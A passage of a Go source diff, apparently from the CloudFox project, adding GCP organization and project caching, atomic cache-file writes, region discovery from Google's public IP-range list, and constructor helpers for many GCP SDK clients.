folderIDs = append(folderIDs, folderID) + + // Get next parent + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + // Parent is an org or unknown, stop here + break + } + } + + return folderIDs +} + +// GetProjectOrgID returns the organization ID for a project. +// Returns empty string if the project is not found or has no org. +func (c *OrgCache) GetProjectOrgID(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return "" + } + + currentParent := project.Parent + + // Walk up until we find an org + for { + if currentParent == "" { + break + } + + // Check if parent is an org + if len(currentParent) > 14 && currentParent[:14] == "organizations/" { + return currentParent[14:] + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + break + } + } + + return "" +} + +// Context key for org cache +type orgCacheKey struct{} + +// GetOrgCacheFromContext retrieves the org cache from context +func GetOrgCacheFromContext(ctx context.Context) *OrgCache { + if cache, ok := ctx.Value(orgCacheKey{}).(*OrgCache); ok { + return cache + } + return nil +} + +// SetOrgCacheInContext returns a new context with the org cache +func SetOrgCacheInContext(ctx context.Context, cache *OrgCache) context.Context { + return context.WithValue(ctx, orgCacheKey{}, cache) +} diff --git a/internal/gcp/persistent_cache.go b/internal/gcp/persistent_cache.go new file mode 100644 index 00000000..ff4016c0 --- /dev/null +++ b/internal/gcp/persistent_cache.go @@ -0,0 +1,269 @@ +package gcpinternal + +import ( + "encoding/gob" + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + "time" +) + +// DefaultCacheExpiration is the default time after which cache is considered stale +// and will be automatically refreshed +const DefaultCacheExpiration = 24 * time.Hour + +// atomicWriteGob writes data to a file atomically using a temp file and rename +// This prevents corruption if the process is interrupted during write +func atomicWriteGob(filename string, data interface{}) error { + // Create temp file in the same directory (required for atomic rename) + dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*.gob") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + // Ensure cleanup on failure + success := false + defer func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + // Encode to temp file + encoder := gob.NewEncoder(tempFile) + if err := encoder.Encode(data); err != nil { + return fmt.Errorf("failed to encode data: %w", err) + } + + // Sync to ensure data is written to disk + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync temp file: %w", err) + } + + // Close before rename + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close temp file: %w", err) + } + + // Atomic rename + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename temp file: %w", err) + } + + success = true + return nil +} + +// atomicWriteFile writes data to a file atomically +func atomicWriteFile(filename string, data []byte, perm os.FileMode) error { + dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + success := false + defer func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + if _, err := io.WriteString(tempFile, string(data)); err != nil { + return fmt.Errorf("failed to write data: %w", err) + } + + if err := tempFile.Chmod(perm); err != nil { + return fmt.Errorf("failed to set permissions: %w", err) + } + + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync: %w", err) + } + + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close: %w", err) + } + + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename: %w", err) + } + + success = true + return nil +} + +// CacheMetadata holds information about when the cache was created +type CacheMetadata struct { + CreatedAt time.Time `json:"created_at"` + Account string `json:"account"` + Version string `json:"version"` + ProjectsIn []string `json:"projects_in,omitempty"` // Projects used when creating cache + TotalProjects int `json:"total_projects,omitempty"` // Total projects in org (for org cache) +} + +// PersistentOrgCache is the serializable version of OrgCache +type PersistentOrgCache struct { + Metadata CacheMetadata `json:"metadata"` + Organizations []CachedOrganization `json:"organizations"` + Folders []CachedFolder `json:"folders"` + AllProjects []CachedProject `json:"all_projects"` +} + +// GetCacheDirectory returns the cache directory for a given account +func GetCacheDirectory(baseDir, account string) string { + // Sanitize account email for use in path + sanitized := sanitizeForPath(account) + return filepath.Join(baseDir, "cached-data", "gcp", sanitized) +} + +// sanitizeForPath removes/replaces characters that are problematic in file paths +func sanitizeForPath(s string) string { + // Replace @ and other special chars with underscores + result := make([]byte, 0, len(s)) + for i := 0; i < len(s); i++ { + c := s[i] + if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.' { + result = append(result, c) + } else { + result = append(result, '_') + } + } + return string(result) +} + +// OrgCacheFilename returns the filename for org cache +func OrgCacheFilename() string { + return "org-cache.gob" +} + +// SaveOrgCacheToFile saves the org cache to a gob file using atomic write +func SaveOrgCacheToFile(cache *OrgCache, baseDir, account, version string) error { + cacheDir := GetCacheDirectory(baseDir, account) + if err := os.MkdirAll(cacheDir, 0755); err != nil { + return fmt.Errorf("failed to create cache directory: %w", err) + } + + persistent := PersistentOrgCache{ + Metadata: CacheMetadata{ + CreatedAt: time.Now(), + Account: account, + Version: version, + TotalProjects: len(cache.AllProjects), + }, + Organizations: cache.Organizations, + Folders: cache.Folders, + AllProjects: cache.AllProjects, + } + + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + // Use atomic write: write to temp file, then rename + if err := atomicWriteGob(filename, persistent); err != nil { + return fmt.Errorf("failed to write cache file: %w", err) + } + + // Also save JSON for debugging/inspection + jsonFilename := filepath.Join(cacheDir, "org-cache.json") + jsonData, err := json.MarshalIndent(persistent, "", " ") + if err == nil { + atomicWriteFile(jsonFilename, jsonData, 0644) + } + + return nil +} + +// LoadOrgCacheFromFile loads the org cache from a gob file +func LoadOrgCacheFromFile(baseDir, account string) (*OrgCache, *CacheMetadata, error) { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + file, err := os.Open(filename) + if err != nil { + if os.IsNotExist(err) { + return nil, nil, nil // Cache doesn't exist, not an error + } + return nil, nil, fmt.Errorf("failed to open cache file: %w", err) + } + defer file.Close() + + var persistent PersistentOrgCache + decoder := gob.NewDecoder(file) + if err := decoder.Decode(&persistent); err != nil { + return nil, nil, fmt.Errorf("failed to decode cache: %w", err) + } + + // Convert to in-memory cache + cache := NewOrgCache() + for _, org := range persistent.Organizations { + cache.AddOrganization(org) + } + for _, folder := range persistent.Folders { + cache.AddFolder(folder) + } + for _, project := range persistent.AllProjects { + cache.AddProject(project) + } + cache.MarkPopulated() + + return cache, &persistent.Metadata, nil +} + +// OrgCacheExists checks if an org cache file exists +func OrgCacheExists(baseDir, account string) bool { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + _, err := os.Stat(filename) + return err == nil +} + +// GetCacheAge returns how old a cache file is +func GetCacheAge(baseDir, account, cacheType string) (time.Duration, error) { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + default: + return 0, fmt.Errorf("unknown cache type: %s", cacheType) + } + + info, err := os.Stat(filename) + if err != nil { + return 0, err + } + + return time.Since(info.ModTime()), nil +} + +// IsCacheStale checks if a cache is older than the given duration +func IsCacheStale(baseDir, account, cacheType string, maxAge time.Duration) bool { + age, err := GetCacheAge(baseDir, account, cacheType) + if err != nil { + return true // If we can't determine age, consider it stale + } + return age > maxAge +} + +// DeleteCache removes a cache file +func DeleteCache(baseDir, account, cacheType string) error { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + // Also remove JSON + os.Remove(filepath.Join(cacheDir, "org-cache.json")) + default: + return fmt.Errorf("unknown cache type: %s", cacheType) + } + + return os.Remove(filename) +} diff --git a/internal/gcp/regions.go b/internal/gcp/regions.go new file mode 100644 index 00000000..e7915e75 --- /dev/null +++ b/internal/gcp/regions.go @@ -0,0 +1,201 @@ +package gcpinternal + +import ( + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +// cloudPrefix represents a single IP prefix entry +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// cachedRegions holds the cached region list with expiration +var ( + cachedRegions []string + cachedZones []string + regionsCacheTime time.Time + regionsCacheMutex sync.RWMutex + regionsCacheTTL = 24 * time.Hour +) + +// GetGCPRegions returns a list of all GCP regions from the public cloud.json endpoint +// This does not require any GCP authentication or permissions +// Results are cached for 24 hours +func GetGCPRegions() ([]string, error) { + regionsCacheMutex.RLock() + if len(cachedRegions) > 0 && time.Since(regionsCacheTime) < regionsCacheTTL { + regions := make([]string, len(cachedRegions)) + copy(regions, cachedRegions) + regionsCacheMutex.RUnlock() + return regions, nil + } + regionsCacheMutex.RUnlock() + + // Fetch fresh data + regions, err := fetchGCPRegionsFromPublicEndpoint() + if err != nil { + return nil, err + } + + // Cache the results + regionsCacheMutex.Lock() + cachedRegions = regions + regionsCacheTime = time.Now() + regionsCacheMutex.Unlock() + + return regions, nil +} + +// fetchGCPRegionsFromPublicEndpoint fetches regions from the public Google endpoint +func fetchGCPRegionsFromPublicEndpoint() ([]string, error) { + client := &http.Client{Timeout: 10 * time.Second} + resp, err := client.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, fmt.Errorf("failed to fetch GCP regions: %w", err) + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("failed to fetch GCP regions: HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, fmt.Errorf("failed to parse GCP regions response: %w", err) + } + + // Extract unique regions from scopes + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + // Skip global and empty scopes + if scope == "" || scope == "global" { + continue + } + // Only include scopes that look like regions (contain a hyphen and number) + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to sorted slice + regions := make([]string, 0, len(regionSet)) + for region := range regionSet { + regions = append(regions, region) + } + sort.Strings(regions) + + return regions, nil +} + +// GetGCPZonesForRegion returns common zone suffixes for a region +// GCP zones are typically region + letter suffix (a, b, c, d, etc.) +func GetGCPZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + commonSuffixes := []string{"a", "b", "c", "d", "f"} + zones := make([]string, len(commonSuffixes)) + for i, suffix := range commonSuffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// GetAllGCPZones returns all possible zones for all regions +// This is a best-effort list based on common zone naming patterns +func GetAllGCPZones() ([]string, error) { + regions, err := GetGCPRegions() + if err != nil { + return nil, err + } + + var zones []string + for _, region := range regions { + zones = append(zones, GetGCPZonesForRegion(region)...) + } + return zones, nil +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true + } + } + return false +} + +// CommonGCPRegions is a hardcoded fallback list of common GCP regions +// Used if the public endpoint is unavailable +var CommonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// GetGCPRegionsWithFallback returns regions from the public endpoint, +// falling back to the hardcoded list if the endpoint is unavailable +func GetGCPRegionsWithFallback() []string { + regions, err := GetGCPRegions() + if err != nil || len(regions) == 0 { + return CommonGCPRegions + } + return regions +} diff --git a/internal/gcp/sdk/cache.go b/internal/gcp/sdk/cache.go new file mode 100644 index 00000000..339525fa --- /dev/null +++ b/internal/gcp/sdk/cache.go @@ -0,0 +1,60 @@ +package sdk + +import ( + "strings" + "time" + + "github.com/patrickmn/go-cache" +) + +// GCPSDKCache is the centralized cache for all GCP SDK calls +// Uses the same caching library as AWS and Azure (github.com/patrickmn/go-cache) +// Default expiration: 2 hours, cleanup interval: 10 minutes +var GCPSDKCache = cache.New(2*time.Hour, 10*time.Minute) + +// CacheKey generates a consistent cache key from components +// Example: CacheKey("buckets", "my-project") -> "buckets-my-project" +func CacheKey(parts ...string) string { + return strings.Join(parts, "-") +} + +// ClearCache clears all entries from the cache +func ClearCache() { + GCPSDKCache.Flush() +} + +// CacheStats returns cache statistics +type CacheStats struct { + ItemCount int + Hits uint64 + Misses uint64 +} + +// GetCacheStats returns current cache statistics +func GetCacheStats() CacheStats { + return CacheStats{ + ItemCount: GCPSDKCache.ItemCount(), + // Note: go-cache doesn't track hits/misses directly + // These would need custom implementation if needed + } +} + +// SetCacheExpiration sets a custom expiration for an item +func SetCacheExpiration(key string, value interface{}, expiration time.Duration) { + GCPSDKCache.Set(key, value, expiration) +} + +// GetFromCache retrieves an item from cache +func GetFromCache(key string) (interface{}, bool) { + return GCPSDKCache.Get(key) +} + +// SetInCache stores an item in cache with default expiration +func SetInCache(key string, value interface{}) { + GCPSDKCache.Set(key, value, 0) // 0 = use default expiration +} + +// DeleteFromCache removes an item from cache +func DeleteFromCache(key string) { + GCPSDKCache.Delete(key) +} diff --git a/internal/gcp/sdk/clients.go b/internal/gcp/sdk/clients.go new file mode 100644 index 00000000..1a6c6780 --- /dev/null +++ b/internal/gcp/sdk/clients.go @@ -0,0 +1,1051 @@ +package sdk + +import ( + "context" + "fmt" + + // Go SDK clients (NewClient pattern) + "cloud.google.com/go/artifactregistry/apiv1" + "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/bigquery" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/resourcemanager/apiv3" + secretmanagerclient "cloud.google.com/go/secretmanager/apiv1" + "cloud.google.com/go/storage" + + // REST API services (NewService pattern) + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" + apikeys "google.golang.org/api/apikeys/v2" + artifactregistryapi "google.golang.org/api/artifactregistry/v1" + beyondcorp "google.golang.org/api/beyondcorp/v1" + bigqueryapi "google.golang.org/api/bigquery/v2" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" + certificatemanager "google.golang.org/api/certificatemanager/v1" + cloudbuild "google.golang.org/api/cloudbuild/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" + cloudfunctionsv2 "google.golang.org/api/cloudfunctions/v2" + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudkms "google.golang.org/api/cloudkms/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudscheduler "google.golang.org/api/cloudscheduler/v1" + composer "google.golang.org/api/composer/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + dns "google.golang.org/api/dns/v1" + file "google.golang.org/api/file/v1" + iam "google.golang.org/api/iam/v1" + iap "google.golang.org/api/iap/v1" + logging "google.golang.org/api/logging/v2" + notebooks "google.golang.org/api/notebooks/v1" + orgpolicy "google.golang.org/api/orgpolicy/v2" + pubsubapi "google.golang.org/api/pubsub/v1" + redis "google.golang.org/api/redis/v1" + run "google.golang.org/api/run/v1" + runv2 "google.golang.org/api/run/v2" + secretmanagerapi "google.golang.org/api/secretmanager/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + spanner "google.golang.org/api/spanner/v1" + sqladmin "google.golang.org/api/sqladmin/v1" + sqladminbeta "google.golang.org/api/sqladmin/v1beta4" + storageapi "google.golang.org/api/storage/v1" +) + +// ============================================================================= +// GO SDK CLIENTS (NewClient pattern) - These return *Client types +// ============================================================================= + +// GetStorageClient returns a Cloud Storage client (Go SDK) +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetSecretManagerClient returns a Secret Manager client (Go SDK) +func GetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + client, err := secretmanagerclient.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager client: %w", err) + } + return client, nil +} + +// GetBigQueryClient returns a BigQuery client (Go SDK) +func GetBigQueryClient(ctx context.Context, session *gcpinternal.SafeSession, projectID string) (*bigquery.Client, error) { + client, err := bigquery.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery client: %w", err) + } + return client, nil +} + +// GetPubSubClient returns a Pub/Sub client (Go SDK) +func GetPubSubClient(ctx context.Context, session *gcpinternal.SafeSession, projectID string) (*pubsub.Client, error) { + client, err := pubsub.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub client: %w", err) + } + return client, nil +} + +// GetAssetClient returns a Cloud Asset client (Go SDK) +func GetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + client, err := asset.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create asset client: %w", err) + } + return client, nil +} + +// GetArtifactRegistryClient returns an Artifact Registry client (Go SDK) +func GetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + client, err := artifactregistry.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create artifact registry client: %w", err) + } + return client, nil +} + +// GetOrganizationsClient returns a Resource Manager Organizations client (Go SDK) +func GetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + client, err := resourcemanager.NewOrganizationsClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create organizations client: %w", err) + } + return client, nil +} + +// ============================================================================= +// REST API SERVICES (NewService pattern) - These return *Service types +// ============================================================================= + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud Resource Manager service (v1) +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service (REST API) +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + service, err := secretmanagerapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service (REST API v2) +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + service, err := bigqueryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetStorageService returns a Cloud Storage service (REST API) +func GetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + service, err := storageapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service (REST API) +func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + service, err := artifactregistryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service (v1) +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// GetCloudRunServiceV2 returns a Cloud Run service (v2) +func GetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + service, err := runv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run v2 service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsService returns a Cloud Functions service (v1) +func GetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + service, err := cloudfunctions.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsServiceV2 returns a Cloud Functions v2 service +func GetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + service, err := cloudfunctionsv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions v2 service: %w", err) + } + return service, nil +} + +// GetCloudIdentityService returns a Cloud Identity service +func GetCloudIdentityService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + service, err := cloudidentity.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Identity service: %w", err) + } + return service, nil +} + +// GetAccessContextManagerService returns an Access Context Manager service +func GetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + service, err := accesscontextmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %w", err) + } + return service, nil +} + +// GetRedisService returns a Memorystore Redis service +func GetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + service, err := redis.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Redis service: %w", err) + } + return service, nil +} + +// GetServiceNetworkingService returns a Service Networking service +func GetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + service, err := servicenetworking.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Service Networking service: %w", err) + } + return service, nil +} + +// GetComposerService returns a Cloud Composer service +func GetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + service, err := composer.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Composer service: %w", err) + } + return service, nil +} + +// GetDataflowService returns a Dataflow service +func GetDataflowService(ctx context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + service, err := dataflow.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataflow service: %w", err) + } + return service, nil +} + +// GetDataprocService returns a Dataproc service +func GetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + service, err := dataproc.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataproc service: %w", err) + } + return service, nil +} + +// GetNotebooksService returns a Notebooks service +func GetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + service, err := notebooks.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks service: %w", err) + } + return service, nil +} + +// GetBeyondCorpService returns a BeyondCorp service +func GetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + service, err := beyondcorp.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BeyondCorp service: %w", err) + } + return service, nil +} + +// GetIAPService returns an IAP service +func GetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { + service, err := iap.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %w", err) + } + return service, nil +} + +// GetKMSService returns a Cloud KMS service +func GetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + service, err := cloudkms.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create KMS service: %w", err) + } + return service, nil +} + +// GetSQLAdminService returns a Cloud SQL Admin service (v1) +func GetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + service, err := sqladmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin service: %w", err) + } + return service, nil +} + +// GetSQLAdminServiceBeta returns a Cloud SQL Admin service (v1beta4) +func GetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + service, err := sqladminbeta.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin beta service: %w", err) + } + return service, nil +} + +// GetDNSService returns a Cloud DNS service +func GetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + service, err := dns.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create DNS service: %w", err) + } + return service, nil +} + +// GetPubSubService returns a Pub/Sub service (REST API) +func GetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + service, err := pubsubapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub service: %w", err) + } + return service, nil +} + +// GetLoggingService returns a Cloud Logging service +func GetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + service, err := logging.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Logging service: %w", err) + } + return service, nil +} + +// GetSpannerService returns a Cloud Spanner service +func GetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + service, err := spanner.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Spanner service: %w", err) + } + return service, nil +} + +// GetBigtableAdminService returns a Bigtable Admin service +func GetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + service, err := bigtableadmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Bigtable Admin service: %w", err) + } + return service, nil +} + +// GetFilestoreService returns a Filestore service +func GetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + service, err := file.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Filestore service: %w", err) + } + return service, nil +} + +// GetSourceRepoService returns a Source Repositories service +func GetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + service, err := sourcerepo.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Source Repositories service: %w", err) + } + return service, nil +} + +// GetCloudBuildService returns a Cloud Build service +func GetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + service, err := cloudbuild.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Build service: %w", err) + } + return service, nil +} + +// GetOrgPolicyService returns an Organization Policy service +func GetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + service, err := orgpolicy.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Org Policy service: %w", err) + } + return service, nil +} + +// GetSchedulerService returns a Cloud Scheduler service +func GetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + service, err := cloudscheduler.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Scheduler service: %w", err) + } + return service, nil +} + +// GetAPIKeysService returns an API Keys service +func GetAPIKeysService(ctx context.Context, session *gcpinternal.SafeSession) (*apikeys.Service, error) { + service, err := apikeys.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create API Keys service: %w", err) + } + return service, nil +} + +// GetCertificateManagerService returns a Certificate Manager service +func GetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) 